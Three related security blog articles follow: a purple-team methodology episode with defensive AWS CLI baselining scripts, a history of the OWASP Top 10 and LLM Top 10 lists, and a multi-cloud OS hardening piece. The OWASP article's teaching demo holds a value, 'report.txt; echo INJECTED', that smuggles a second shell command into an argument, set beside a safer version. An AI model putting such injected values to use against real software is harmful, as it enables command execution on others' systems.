  • Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
  • Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
  • The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
  • Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
  • Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.


The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                     │
│              │ What didn't│                                     │
│              │ Why?       │                                     │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.


Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.


What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists several hundred techniques and sub-techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.


What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.


The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat
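
The MEASURE step can be sketched as a small shell function. This is a minimal sketch, assuming a hypothetical results log with one line per technique in the form `technique_id,status,seconds_to_detect`, where status is `fired`, `not_fired`, or `noisy`. The log format and the function name `summarize_exercise` are illustrative assumptions, not part of any tool named in this series.

```shell
#!/bin/sh
# Summarize a purple team exercise log (hypothetical CSV format):
#   technique_id,status,seconds_to_detect
# Assumption: only a clean "fired" counts as detected; "noisy" and
# "not_fired" both count as gaps that still need tuning.
summarize_exercise() {
  awk -F',' '
    NF >= 2 { total++ }
    $2 == "fired" { fired++; sum += $3 }
    END {
      if (total == 0) { print "no techniques recorded"; exit }
      rate = 100 * fired / total
      mean = (fired > 0) ? sum / fired : 0
      printf "techniques=%d detected=%d rate=%.0f%% mean_detect_s=%.0f\n", total, fired, rate, mean
    }
  ' "$@"
}

# Example run with illustrative data (not real measurements)
printf '%s\n' \
  'T1078,fired,240' \
  'T1530,not_fired,' \
  'T1098,fired,600' \
  'T1087,noisy,' | summarize_exercise
# prints: techniques=4 detected=2 rate=50% mean_detect_s=420
```

Keeping the log as plain text means it can be committed next to the detection rules it measures, so the next exercise has a concrete number to beat.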

This is what “purple” means: red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.


The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.
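
The coverage report quoted above can be computed from two plain lists. A minimal sketch, assuming two hypothetical text files with one ATT&CK technique ID per line: the techniques in scope for your threat model, and the techniques with a verified detection. The file names and the function name `coverage_report` are assumptions for illustration.

```shell
#!/bin/sh
# coverage_report RELEVANT_FILE VERIFIED_FILE
# Prints how many in-scope techniques have a verified detection,
# then lists the ones that do not.
coverage_report() {
  relevant=$1
  verified=$2
  total=$(grep -c . "$relevant" || true)
  if [ "$total" -eq 0 ]; then
    echo "no techniques in scope"
    return 1
  fi
  # Lines of RELEVANT that also appear, as whole lines, in VERIFIED
  covered=$(grep -Fx -f "$verified" "$relevant" | grep -c . || true)
  # Integer percent, rounded down
  echo "verified $covered of $total ($((100 * covered / total))%)"
  echo "not yet covered:"
  grep -Fxv -f "$verified" "$relevant" || true
}

# Example with illustrative technique lists
demo=$(mktemp -d)
printf '%s\n' T1078 T1530 T1098 T1087 > "$demo/relevant.txt"
printf '%s\n' T1078 T1098 > "$demo/verified.txt"
coverage_report "$demo/relevant.txt" "$demo/verified.txt"
rm -rf "$demo"
```

With the figures quoted above, 47 of 112 is roughly 42% coverage (the integer arithmetic in this sketch rounds it down to 41).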


Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Server-Side Request Forgery (A10) is the request that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.


Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.


Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

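# Count GuardDuty findings updated in the last 30 days, grouped by finding type
# (date -d is GNU date syntax; on macOS/BSD use: date -v-30d +%s000)
aws guardduty list-findings \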
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -r -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'
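
# List trails, then check whether each one is actually logging
# (HasCustomEventSelectors only says whether custom event selectors exist, not whether logging is on)
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail}' --output table
aws cloudtrail describe-trails --query 'trailList[].TrailARN' --output text | \
  tr '\t' '\n' | \
  while read -r trail; do
    [ -n "$trail" ] || continue
    status=$(aws cloudtrail get-trail-status --name "$trail" --query 'IsLogging' --output text)
    echo "IsLogging=$status  $trail"
  done
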
# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.


⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.


Quick Reference

Term | Definition
Purple team security | Practice of combined red/blue exercises where both teams improve detection together
MTTD | Mean Time to Detect, the primary metric purple team exercises reduce
ATT&CK | MITRE framework mapping adversary techniques to data sources and detections
Red phase | Attacker perspective: simulate the technique with real commands
Blue phase | Defender perspective: what detection fires (or doesn’t)
Purple phase | The joint debrief and immediate detection tuning that makes both better
Detection baseline | Measured MTTD and technique coverage before the first exercise
OWASP Top 10 | Threat taxonomy used in this series; applies to infrastructure, not just web apps

Key Takeaways

  • Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
  • The metric that matters is detection time per technique — not findings count
  • Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
  • MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
  • Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
  • Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
  • Frequency of exercises is the primary driver of improvement: monthly exercises give you twelve measured iterations a year where an annual engagement gives you one

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 History: How the List Evolved from 2003 to 2025

Reading Time: 8 minutes


series: OWASP LLM Top 10: From Web Roots to AI Frontiers
episode: 1 of 22


OWASP Top 10 History · The Four OWASP Lists · Why Classic OWASP Breaks for LLMs · OWASP LLM Top 10 2025


TL;DR

  • The OWASP Top 10 spans six published versions from 2003 to 2021. The category names change every cycle; the underlying failure classes do not
  • Injection, broken authentication, and access control have appeared in every single version under different names; they were exploited in 2003 and they are still the top breach vectors in 2025
  • The 2021 edition abstracted away from web-app-specific language into attack classes — which is what made OWASP applicable to cloud infrastructure, APIs, Kubernetes, and ultimately AI systems
  • OWASP is not a compliance standard; it is a community consensus on risk — but in 2025, the EU AI Act began directly citing the OWASP AI Exchange, which changes that calculus
  • Four distinct OWASP Top 10 lists exist today: Web App (2021), API Security (2023), Cloud-Native App Security, and LLM Applications (2025) — this series covers the last one, built on the foundation of the first

OWASP Mapping: Foundation episode. No single OWASP LLM category. This episode traces the lineage from OWASP Top 10 (2003) through all six web app versions to the four lists that exist in 2025. Every subsequent episode maps directly to one or more OWASP LLM Top 10 (2025) categories.


The Big Picture

OWASP TOP 10 EVOLUTION: 2003 → 2025

2003 ──▶ Web-era injection (SQL, XSS, parameter tampering)
          │  HTTP/1.0 apps. Databases directly exposed via
          │  dynamic SQL. Sessions via URL parameters.
          │
2007 ──▶ Session management + insecure comms elevated
          │  HTTPS adoption slow. Cookie theft common.
          │
2010 ──▶ Unvalidated redirects added. XSS re-ranked.
          │  The list reflects what's being actively exploited.
          │
2013 ──▶ CSRF moved down. Missing Function-Level Access added.
          │  First signs of API/microservice thinking.
          │
2017 ──▶ Risk-weighted ranking. CWE mappings. XXE added.
          │  Insecure Deserialization, Logging failures enter.
          │  The list becomes infrastructure-aware.
          │
2021 ──▶ Abstracted to attack classes. Insecure Design +
          │  SSRF added. Infrastructure/cloud applicability.
          │  ┌──────────────────────────────┐
          │  │ Now maps to cloud infra      │ ← Purple Team EP02
          │  │ Kubernetes, APIs, pipelines  │
          │  └──────────────────────────────┘
          │
          ├──▶ API Security Top 10 (2023)
          │     REST/GraphQL-specific risks
          │
          ├──▶ Cloud-Native App Security Top 10
          │     Containers, orchestration
          │
          └──▶ LLM Applications Top 10 (2023 v1 → 2025 v2)
                Prompt injection, model poisoning, RAG attacks
                ← THIS SERIES

The OWASP Top 10 is not a list of bugs. It is a snapshot, taken every three to four years, of where the application surface was and where attackers found the seams.


The 2003 Founding: What the Web Looked Like

The OWASP Foundation was established in 2001. The first Top 10 list shipped in 2003.

The web in 2003 looked nothing like it does now. Applications were monolithic. Databases were queried directly via dynamic SQL strings concatenated from user input. Session identifiers were often passed in URL parameters. “Security” was a firewall at the network perimeter: if you were inside the network, you were trusted.

SQL injection was not a theoretical risk. It was how attackers exfiltrated data in bulk, every day, at scale. The same for XSS: inject JavaScript into a page, steal session cookies, impersonate users. These were not edge cases — they were the primary breach vectors because the web was built without any assumption that input was untrusted.

The OWASP founding premise: developers build these vulnerabilities not because they are negligent, but because the threat model was never taught. The Top 10 list was documentation, not enforcement — a shared vocabulary for what actually causes breaches.


Version-by-Version: What Changed and What Did Not

Year | Most Significant Addition | What Dropped / Changed | What It Reflects
2003 | Unvalidated Input, SQL Injection, XSS, Command Injection | - | Dynamic SQL era; input treated as trusted
2007 | CSRF, Insecure Comms, Improper Error Handling | Unvalidated Input consolidated | HTTPS adoption gap; session theft via network
2010 | Unvalidated Redirects + Forwards | CSRF de-emphasized | Open redirectors weaponized for phishing
2013 | Missing Function-Level Access | CSRF moved down the ranking; Insecure Storage removed | API-style thinking entering the list
2017 | Insecure Deserialization, Logging + Monitoring Failures, XXE | Unvalidated Redirects and CSRF dropped | Server-side attack complexity; blind spots in detection
2021 | Insecure Design (new class), SSRF | XSS merged under Injection | Architecture-level risk; abstract attack classes introduced

The column that doesn’t change: Broken Access Control, Injection, and Authentication Failures have appeared in every version. The names shift (A01 becomes A07 becomes A01 again). The category descriptions evolve. The underlying failure — you can access things you shouldn’t, or execute code you shouldn’t, or authenticate as someone you’re not — never leaves the list.

This is the most important observation in the entire series: OWASP’s vocabulary modernizes; the failure classes are constants. When you see LLM01 Prompt Injection in the 2025 LLM list, you are looking at the same failure class as A03 Injection in the web app list. The attack surface changed. The category did not.


What the 2021 Abstraction Unlocked

The 2017 → 2021 transition was architecturally significant. Prior versions were implicitly scoped to HTTP requests against web applications. The 2021 list made a deliberate choice to describe attack classes rather than attack techniques.

“Injection” in 2021 means: untrusted data is sent to an interpreter and executed as code or commands. That definition covers SQL injection, LDAP injection, OS command injection — and, it turns out, natural language prompt injection in LLMs. The definition doesn’t care what the interpreter is.
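
The definition can be demonstrated with any interpreter. The following is a minimal sketch that uses the POSIX shell as the interpreter; the function names and the payload are illustrative assumptions. The vulnerable version splices untrusted data into the string the interpreter parses, while the safer version hands the same data over as an argument that is never parsed as code.

```shell
#!/bin/sh
# Untrusted input carrying shell syntax (illustrative payload)
user_input='report.txt; echo INJECTED'

# Vulnerable: the input becomes part of the command string, so sh parses
# "; echo INJECTED" as a second command and runs it.
vulnerable() {
  sh -c "echo listing $1"
}

# Safer: the command string is fixed; the input arrives as positional
# argument $1 and is only ever treated as data.
safer() {
  sh -c 'echo "listing $1"' _ "$1"
}

vulnerable "$user_input"   # two lines of output: the payload executed
safer "$user_input"        # one line of output: the payload printed as text
```

The structure is the same when the interpreter is a SQL engine or a language model: the failure is data and instructions sharing one channel.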

“Broken Access Control” in 2021 means: a principal can act on a resource or perform an action it was not intended to. That covers misconfigured S3 buckets, Kubernetes RBAC gaps — and an LLM agent with tool access that hasn’t been scoped to least capability.
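
Scoping an agent to least capability can be as simple as a deny-by-default allowlist in front of every tool call. A minimal sketch, assuming hypothetical tool names; a real agent framework would have its own tool registry and enforcement point.

```shell
#!/bin/sh
# Hypothetical tool names, for illustration only.
ALLOWED_TOOLS="search_docs read_ticket"

# tool_allowed NAME: succeed only if NAME is on the allowlist.
# Anything not explicitly listed is denied.
tool_allowed() {
  case "$1" in
    ''|*[!A-Za-z0-9_]*) return 1 ;;   # reject empty or oddly shaped names outright
  esac
  case " $ALLOWED_TOOLS " in
    *" $1 "*) return 0 ;;
    *)        return 1 ;;
  esac
}

for tool in search_docs delete_bucket; do
  if tool_allowed "$tool"; then
    echo "allow: $tool"
  else
    echo "deny:  $tool"
  fi
done
```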

This abstraction is why OWASP became applicable to cloud infrastructure, APIs, containers, and AI. It’s also why the Purple Team series (specifically EP02) was able to map the entire 2021 list directly to cloud infrastructure attack paths — and why this series can map the same abstraction to LLM attack surfaces.

For the cloud infrastructure angle, see OWASP Top 10 mapped to cloud infrastructure. This series starts where that one ends: the attack surface that cloud infrastructure runs on is increasingly powered by language models.


The Four Lists That Exist Today

OWASP has expanded beyond the original web app list. Four Top 10 lists are actively maintained as of 2025:

OWASP Top 10 — Web Application Security Risks (2021)
The original. HTTP-layer attacks on server-rendered or API-backed apps. A01 Broken Access Control through A10 SSRF. Still the baseline for any web-facing application.

OWASP API Security Top 10 (2023)
REST and GraphQL-specific. Broken Object Level Authorization (BOLA/IDOR), Broken Object Property Level Authorization (which absorbed the earlier excessive data exposure and mass assignment entries), unrestricted resource consumption. API attacks account for the majority of cloud breaches. This list exists because the web app list missed API-specific attack surfaces.

OWASP Cloud-Native Application Security Top 10
Kubernetes, containers, orchestration-layer risks: insecure workload configurations, misconfigured cloud storage, vulnerable container images, runtime compromise. The cloud-infra angle.

OWASP Top 10 for LLM Applications (2025)
The list this series is built on. Prompt injection, model poisoning, supply chain risks for model artifacts, RAG database attacks, autonomous agent over-permission. The attack surfaces that arrive when you embed a language model in your infrastructure.

The full comparison — which list applies to which part of your architecture, and how they overlap — is in the next episode.


Why AI Arrived at OWASP

The OWASP Top 10 for LLM Applications was not invented top-down. It came from practitioners who were deploying language models and cataloguing the breach patterns they were seeing.

The first version (v1.0) shipped in August 2023, driven by a working group that formed in May 2023 — roughly six months after ChatGPT created widespread LLM deployment. The timeline matters: security researchers were finding real vulnerabilities in production systems in real time, and the OWASP list was the community’s way of documenting the emerging threat model before it became a liability.

Version 2.0 shipped in November 2024. Two entirely new categories — System Prompt Leakage (LLM07) and Vector/Embedding Weaknesses (LLM08) — were added because RAG-based applications and agentic AI had become prevalent enough that their specific attack surfaces warranted dedicated treatment. Sensitive Information Disclosure moved from #6 to #2 because real breach data, not theory, showed it was the second most commonly exploited category.

The OWASP AI Exchange — a parallel OWASP project — went further. It produced a 300-page technical guide on AI security and privacy and contributed directly to the EU AI Act’s technical requirements. As of 2025, the EU AI Act for high-risk AI systems references risk assessment requirements that align directly with OWASP LLM Top 10 categories. OWASP is still not a compliance standard. But for AI systems in the EU, ignoring it is no longer a neutral choice.


⚠ Production Gotchas

“OWASP is a checklist you run once”
It’s a living document updated every 3–4 years based on actual breach data. The 2021 web app list is not the same document as the 2017 list. The 2025 LLM list has different categories than the 2023 v1 list. Running the 2017 checklist on a 2025 system is not OWASP compliance — it is a false sense of coverage.

“We are OWASP compliant”
OWASP is not a compliance standard. There is no OWASP certification, no OWASP audit, no OWASP controls framework. Organizations that say “we are OWASP compliant” mean they have reviewed the list and addressed the categories. That is a risk reduction exercise, not a regulatory state. The EU AI Act is a regulation. NIST AI RMF is a voluntary risk management framework. OWASP is a technical reference for operationalizing both.

“The LLM Top 10 only matters if you’re building LLMs”
You don’t need to build LLMs for the list to apply. If you are deploying a chatbot powered by a third-party API, using an AI coding assistant that has access to your codebase, or running a RAG application that indexes internal documents — you are within scope of LLM01 through LLM10. The attack surface is the integration, not the model itself.


Quick Reference: OWASP Top 10 Versions

Year | Version | Key Additions | Key Removals | Architectural Context
2003 | v1.0 | Injection, Broken Auth, XSS, Insecure Config | - | Monolithic web apps, dynamic SQL
2007 | v2.0 | CSRF, Insecure Comms | Unvalidated Input → merged | HTTPS gap, session theft
2010 | v3.0 | Unvalidated Redirects | - | Phishing via redirectors
2013 | v4.0 | Missing Function-Level Access | CSRF moved to lower priority | API patterns emerging
2017 | v5.0 | XXE, Insecure Deserialization, Logging Failures | Unvalidated Redirects | Microservices, detection gaps
2021 | v6.0 | Insecure Design, SSRF | XSS merged into Injection | Attack class abstraction; cloud/AI applicability

Current parallel lists:

List | Last Updated | Primary Surface | Key Org
Web App Top 10 | 2021 | HTTP/web apps | OWASP
API Security Top 10 | 2023 | REST/GraphQL APIs | OWASP
Cloud-Native App Security Top 10 | 2022 | K8s/containers | OWASP
LLM Applications Top 10 | 2025 (v2.0) | Language models/AI | OWASP GenAI

Framework Alignment

Framework | Relevant Function | Connection to OWASP History
NIST CSF 2.0 | IDENTIFY (ID.RA) | OWASP is the community risk catalog that feeds asset risk assessments
ISO 27001:2022 | A.8.8 (vulnerability management) | OWASP Top 10 is the standard reference for vulnerability class coverage
NIST AI RMF | MAP 1.5 | Identify which risk categories from OWASP LLM Top 10 apply to specific system components
EU AI Act | Art. 9 (risk management system) | High-risk AI system risk assessments reference OWASP AI Exchange technical guidance

Key Takeaways

  • OWASP Top 10 history is the story of attack surfaces expanding — web to API to cloud to AI — with the same failure classes appearing at each layer
  • The 2021 abstraction to attack classes (not web-specific techniques) was the architectural decision that made OWASP applicable everywhere, including LLMs
  • Four lists exist today; real systems touch multiple lists simultaneously
  • The LLM Top 10 (v2.0, 2025) is not theoretical — it was built from documented production breach patterns, and v2.0 added new categories because RAG and agentic AI created new attack surfaces fast enough to warrant them
  • OWASP is a risk framework, not a compliance standard — until 2025, when the EU AI Act began referencing OWASP AI Exchange guidance for high-risk AI systems

What’s Next

EP02 answers the navigation question this episode raises: if four OWASP lists exist, which one applies to your system — and what happens when a single architecture touches all four at once?

The Four OWASP Lists: Web App, API, Cloud-Native, and LLM Compared →


One Blueprint, Six Clouds — Multi-Provider OS Image Builds

Reading Time: 6 minutes

OS Hardening as Code, Episode 3
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening


TL;DR

  • Multi-cloud OS hardening with separate scripts per provider means three scripts that drift within weeks
  • A HardeningBlueprint YAML separates compliance intent (portable) from provider details (handled by Stratum’s provider layer)
  • The same blueprint builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox with a single --provider flag change
  • Provider-specific differences — disk names, cloud-init ordering, metadata endpoint IPs — are abstracted away from the blueprint author
  • One YAML file becomes the single source of truth for OS security posture across your entire fleet, regardless of cloud
  • Drift detection works fleet-wide: rescan any instance against the original blueprint grade on any provider

The Problem: Three Clouds, Three Scripts, Three Ways to Drift

AWS hardening script          GCP hardening script          Azure hardening script
├── /dev/xvd* disk refs       ├── /dev/sda* disk refs       ├── /dev/sda* disk refs
├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS
├── cloud-init order A        ├── cloud-init order B        ├── cloud-init order C
└── Updated: Jan 2025         └── Updated: Aug 2024         └── Updated: Mar 2024
                                         │
                                         └─ 5 months behind
                                            on CIS updates

Multi-cloud OS hardening starts as a copy-paste of the AWS script. Within a month, the clouds diverge.

EP02 showed that a HardeningBlueprint YAML eliminates the skip-at-2am problem by making hardening a build artifact. What it assumed — quietly — is that you’re building for one provider. The moment you expand to a second cloud, the provider-specific details in the blueprint become a problem: disk names differ, cloud-init fires in a different order, and AWS-specific assumptions break silently on GCP.


We expanded from AWS to GCP six months ago. The EC2 hardening script had been working reliably for over a year. The GCP engineer took the AWS script, made some quick changes, and started building images.

The first GCP images had a subtle problem: the /tmp and /home separate partition entries in /etc/fstab referenced /dev/xvdb — an AWS disk naming convention. GCP uses /dev/sdb. The fstab entries were silently ignored. The mounts existed but weren’t restricted. The CIS controls for separate filesystem partitions were listed as passing in the scan output because the Ansible task had “run successfully” — it just hadn’t done what we thought.

It took a pentest three months later to catch it. The finding: six production GCP instances with /tmp not mounted with noexec, nosuid, nodev — despite our “CIS L1 hardened” label.

The root cause wasn’t the engineer. It was a hardening approach that required cloud-specific knowledge embedded in the script rather than in a provider abstraction layer.
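
The scan in this story trusted “the task ran” over the observed state of the system. A minimal sketch of checking the observed state instead: it reads a mount table in `/proc/mounts` format and reports which of the restricted options are missing from `/tmp`. The function name `check_tmp_options` is an assumption for illustration, not a Stratum or OpenSCAP command.

```shell
#!/bin/sh
# check_tmp_options: read a mount table (/proc/mounts format) on stdin and
# verify that /tmp is a separate mount carrying nodev, nosuid and noexec.
check_tmp_options() {
  awk '
    $2 == "/tmp" {
      found = 1
      n = split($4, opts, ",")
      for (i = 1; i <= n; i++) have[opts[i]] = 1
    }
    END {
      if (!found) { print "FAIL: /tmp is not a separate mount"; exit 1 }
      missing = ""
      if (!("nodev" in have))  missing = missing " nodev"
      if (!("nosuid" in have)) missing = missing " nosuid"
      if (!("noexec" in have)) missing = missing " noexec"
      if (missing != "") { print "FAIL: /tmp missing" missing; exit 1 }
      print "PASS: /tmp has nodev,nosuid,noexec"
    }
  '
}

# Illustrative mount table line resembling the broken GCP images described above
printf '%s\n' '/dev/sdb /tmp ext4 rw,relatime 0 0' | check_tmp_options || true

# On a live Linux host: check_tmp_options < /proc/mounts
```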


How Stratum Separates Compliance Intent from Provider Details

Multi-cloud OS hardening works when the compliance intent and the provider details are kept strictly separate.

HardeningBlueprint YAML
(compliance intent — portable)
         │
         ▼
  Stratum Provider Layer
  ┌─────────────────────────────────────────────┐
  │  AWS         │  GCP         │  Azure        │
  │  /dev/xvd*   │  /dev/sda*   │  /dev/sda*    │
  │  IMDS v2     │  GCP IMDS    │  Azure IMDS   │
  │  cloud-init  │  cloud-init  │  waagent       │
  │  order A     │  order B     │  order C       │
  └─────────────────────────────────────────────┘
         │
         ▼
  Ansible-Lockdown + Provider-Aware Configuration
         │
         ▼
  OpenSCAP Scan
         │
         ▼
  Golden Image (AMI / GCP Image / Azure Image)

The blueprint author declares what should be true about the OS. Stratum’s provider layer handles how that’s achieved on each cloud.

The disk naming, cloud-init sequencing, metadata endpoint configuration, and provider-specific package repositories are all abstracted into the provider layer. They never appear in the blueprint file.


The Same Blueprint Across Six Providers

# Build the same baseline on three clouds
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
stratum build --blueprint ubuntu22-cis-l1.yaml --provider gcp
stratum build --blueprint ubuntu22-cis-l1.yaml --provider azure

# The other three supported providers
stratum build --blueprint ubuntu22-cis-l1.yaml --provider digitalocean
stratum build --blueprint ubuntu22-cis-l1.yaml --provider linode
stratum build --blueprint ubuntu22-cis-l1.yaml --provider proxmox

The blueprint file is identical across all six. The output — AMI, GCP machine image, Azure managed image — is equivalent in terms of security posture. The same 144 CIS L1 controls apply. The same OpenSCAP scan runs. The same grade lands in the image metadata.

If you change the blueprint — add a control, update the Ansible role version, add a custom audit logging configuration — you rebuild all providers from the same source and all images come out consistent.


What the Provider Layer Handles

The provider layer is where the cloud-specific knowledge lives, so the blueprint author doesn’t have to carry it:

Disk naming:

Provider | OS disk | Ephemeral | Data
AWS | /dev/xvda | /dev/xvdb | /dev/xvdc+
GCP | /dev/sda | - | /dev/sdb+
Azure | /dev/sda | /dev/sdb (temp disk) | /dev/sdc+
DigitalOcean | /dev/vda | - | /dev/vdb+

The CIS controls for separate /tmp and /home partitions reference disk paths that differ across these providers. The provider layer translates the blueprint’s filesystem.tmp declaration into the correct fstab entries for the target cloud.
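
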